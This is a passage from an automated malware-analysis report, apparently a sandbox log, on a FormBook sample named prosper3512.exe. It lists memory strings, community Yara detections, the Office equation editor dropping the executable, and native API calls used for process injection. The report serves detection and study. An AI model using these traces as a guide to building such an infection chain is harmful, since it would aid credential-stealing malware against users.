          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2096162497.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2097698723.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2096881380.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehps
          Source: explorer.exe, 00000006.00000000.2096881380.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2095206915.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: explorer.exe, 00000006.00000000.2095206915.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000006.00000000.2096881380.00000000041AD000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1es
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\prosper3512.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\control.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\control.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00419D50 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00419E00 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00419E80 NtClose,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00419F30 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00419D4C NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00419DFD NtReadFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00419E7A NtClose,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00419F2B NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00930048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00930078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009310D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00930060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009301D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0093010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00931148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009307AC NtCreateMutant,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092F8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00931930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092F938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FB50 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FC30 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00930C40 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FC48 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00931D80 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FD5C NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FE24 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FFFC NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0092FF34 NtQueueApcThread,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00419D50 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00419E00 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00419E80 NtClose,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00419F30 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00419D4C NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00419DFD NtReadFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00419E7A NtClose,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00419F2B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021400C4 NtCreateFile,LdrInitializeThunk,
